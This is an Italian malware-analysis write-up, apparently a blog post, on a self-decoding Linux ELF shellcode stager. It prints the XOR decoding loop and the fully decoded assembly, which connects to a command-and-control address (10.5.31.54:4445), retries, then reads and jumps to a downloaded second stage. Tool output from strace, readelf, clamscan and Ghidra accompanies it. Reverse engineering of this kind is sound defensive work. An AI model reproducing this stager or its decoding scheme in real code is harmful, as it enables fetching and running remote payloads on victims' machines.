0x00400078 mov edi, 0x6e301cbd
0x0040007d fcmovnu st(0), st(4)
0x0040007f fnstenv [rsp - 0xc]
0x00400083 pop rdx
0x00400084 sub ecx, ecx ; arg4
0x00400086 mov cl, 0x21 ; '!' ; 33
0x00400088 sub edx, 0xfffffffc
0x0040008b xor dword [rdx + 0x10], edi
0x00400091 pop rdi
0x00400092 jmp 0x78a0600f
;il malware si comporta in maniera del tutto simile all'elf malware2 analizzato nel post procedente; la cosa particolare di questo malware risiede nel fatto che staticamente non può essere analizzato; abbiamo solo un piccolo pezzettino di codice dopo il quale sia radare2 sia ghidra vedono badcode senza alcun significato; ma analizzando con il debugger di radare2, passo dopo passo, si può notare come il malware va a riscriversi partendo dall'indirizzo di memoria 0x00400091;
rdx 0x00400081 + 0x10 = 0x00400091
:> x/8x 0x00400091
0x00400091 5fe9 785f 6078 70c7
;in rdi abbiamo il valore 0x6e301cbd
0x00400091 pop rdi
0x00400092 jmp 0x78a0600f
;analizzando staticamente il disassemblato in queste locazioni di memoria abbiamo questi comandi, e poi a seguire codice che ghidra e radare2 considerano badcode;
ma è proprio il codice stesso che inizia a riscriversi creando prima un loop e poi attraverso il loop stesso, si riscrive completamente mediante delle xor;
5fe9
bd1c
e2f5 4831 6078 70c7
0x0040008b xor dword [rdx + 0x10], edi
0x0040008e add edi, dword [rdx + 0x10]
0x00400091 loop 0x400088
;rdx 0x00400081 + 0x10 = 0x00400091
;a questo indirizzo infatti abbiamo il byte 5f che viene xororato con il byte meno significativo di edi, edi=0x6e301cbd, che è bd
5f ^ bd = e2
e9 ^ 1c = f5
;e2f5 vengono poi tradotti nell'istruzione loop 0x400088 che si ripeterà ecx volte, ogni volta andando a riscrivere parte del malware; solo alla fine di questo loop abbiamo il codice disassemblato completo del malware;
[0x00400078]> pdf
0x00400078 mov edi, 0x6e301cbd
0x0040007d fcmovnu st(0), st(4)
0x0040007f fnstenv [rsp - 0xc]
0x00400083 pop rdx
0x00400084 sub ecx, ecx ;arg4
0x00400086 mov cl, 0x21 ;33
0x00400088 sub edx, 0xfffffffc
0x0040008b xor dword [rdx + 0x10], edi
0x0040008e add edi, dword [rdx + 0x10]
0x00400091 loop 0x400088
0x00400093 xor rdi, rdi
0x00400096 push 9 ;rax
0x00400098 pop rax
0x00400099 cdq
0x0040009a mov dh, 0x10 ;16
0x0040009c mov rsi, rdx
0x0040009f xor r9, r9
0x004000a2 push 0x22 ;r10
0x004000a4 pop r10
0x004000a6 mov dl, 7
0x004000a8 syscall
;la prima syscall è mmap
0x004000aa test rax, rax
0x004000ad js 0x400100
0x004000af push 0xa ;10
0x004000b1 pop r9
0x004000b3 push rax
0x004000b4 push 0x29 ;41
0x004000b6 pop rax
0x004000b7 cdq 0x004000b8 6a02 push 2 ;2
0x004000ba pop rdi
0x004000bb push 1 ;1
0x004000bd pop rsi
0x004000be syscall
;la seconda syscall è la socket
0x004000c0 test rax, rax
0x004000c3 js 0x400100
0x004000c5 xchg rdi, rax
0x004000c7 movabs rcx, 0x361f050a5d110002
;54
;31
;5
;10
;10.5.31.54 --> C&C
>>> 0x115d
4445
0x004000d1 push rcx
0x004000d2 mov rsi, rsp
0x004000d5 push 0x10 ; 16
0x004000d7 pop rdx
0x004000d8 push 0x2a ; '*' ; 42
0x004000da pop rax
0x004000db syscall
;poi abbiamo una connect
0x004000dd pop rcx
0x004000de test rax, rax
0x004000e1 jns 0x400108
0x004000e3 dec r9
0x004000e6 je 0x400100
0x004000e8 push rdi
0x004000e9 push 0x23 ;35
0x004000eb pop rax
0x004000ec push 0
0x004000ee push 5 ;5
0x004000f0 mov rdi, rsp
0x004000f3 xor rsi, rsi
0x004000f6 syscall
;nanosleep
0x004000f8 pop rcx
0x004000f9 pop rcx
0x004000fa pop rdi
0x004000fb test rax, rax
0x004000fe jns 0x4000c7
;aspetta e torna indietro e riprova la connect
0x00400100 push 0x3c ;60
0x00400102 pop rax
0x00400103 push 1 ;1
0x00400105 pop rdi
0x00400106 syscall
;exit
0x00400108 pop rsi
0x00400109 push 0x7e ; '~' ; 126
0x0040010b pop rdx
0x0040010c syscall
;qui dovrebbe essere una read
0x0040010e test rax, rax
0x00400111 js 0x400100
0x00400113 jmp rsi
;qui salta al codice scaricato dalla read
;fcmovnu floating-point condition move; move if not unordered (PF=0)
fnstenv Saves the current FPU operating environment at the memory location specified with the destination operand, and then masks all floating-point exceptions.
strace ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
execve("./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b", ["./5eb69f3b46a0df45f5e4f2c0beede4"...], 0x7ffd4f7d2240 /* 48 vars */) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7f845e483000
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4445), sin_addr=inet_addr("10.5.31.54")}, 16) = -1 ENETUNREACH (Network is unreachable)
nanosleep({tv_sec=5, tv_nsec=0}, ^Cstrace: Process 1716 detached
<detached ...>
;strace
ltrace ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
Couldn't find .dynsym or .dynstr in "/proc/1746/exe"
;ltrace
clamscan ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
/home/remnux/FollowTheWhiteRabbit/Linux-Malware-Samples/quarantena/5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b: Win.Trojan.MSShellcode-6360729-4 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 8656935
Engine version: 0.103.6
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 22.428 sec (0 m 22 s)
Start Date: 2023:03:27 11:44:54
End Date: 2023:03:27 11:45:17
;clamscan
readelf -s ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
Dynamic symbol information is not available for displaying symbols.
readelf -l ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000000115 0x00000000000001b2 RWE 0x1000
readelf -h ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x400078
Start of program headers: 64 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 1
Size of section headers: 0 (bytes)
Number of section headers: 0
Section header string table index: 0
;readelf
void entry(void)
{
uint *puVar1;
int in_FPUInstructionPointer;
puVar1 = (uint *)((ulong)(in_FPUInstructionPointer + 4) + 0x10);
*puVar1 = *puVar1 ^ 0x6e301cbd;
/* WARNING: Bad instruction - Truncating control flow here */
halt_baddata();
}
;ghidra decompiler
Edited by AKIRA BASHO - 19/11/2023, 14:28
